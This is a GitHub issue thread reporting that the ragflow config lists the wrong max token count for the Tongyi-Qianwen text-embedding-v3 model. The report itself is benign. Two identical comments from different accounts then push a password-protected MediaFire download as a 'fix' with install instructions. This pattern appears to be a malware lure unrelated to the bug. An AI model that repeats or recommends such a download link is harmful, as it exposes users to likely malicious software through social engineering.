### ISSUE TITLE
[Bug]: The max token of Tongyi-Qianwen text-embedding-v3 model should be 8k

### ISSUE THREAD

**Issue by hwzhuhao** [infiniflow/ragflow#2117]
### Is there an existing issue for the same bug?

- [X] I have checked the existing issues.

### Branch name

main

### Commit ID

ragflow-0.10.0

### Actual behavior

The max token of Tongyi-Qianwen text-embedding-v3 model should be 8k.

![qwen-text-embedding-v3](https://github.com/user-attachments/assets/fdeb2504-7b8c-4de4-a48a-ccf4503f214f)

### Steps to reproduce

```Markdown
cat conf/llm_factories.json
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
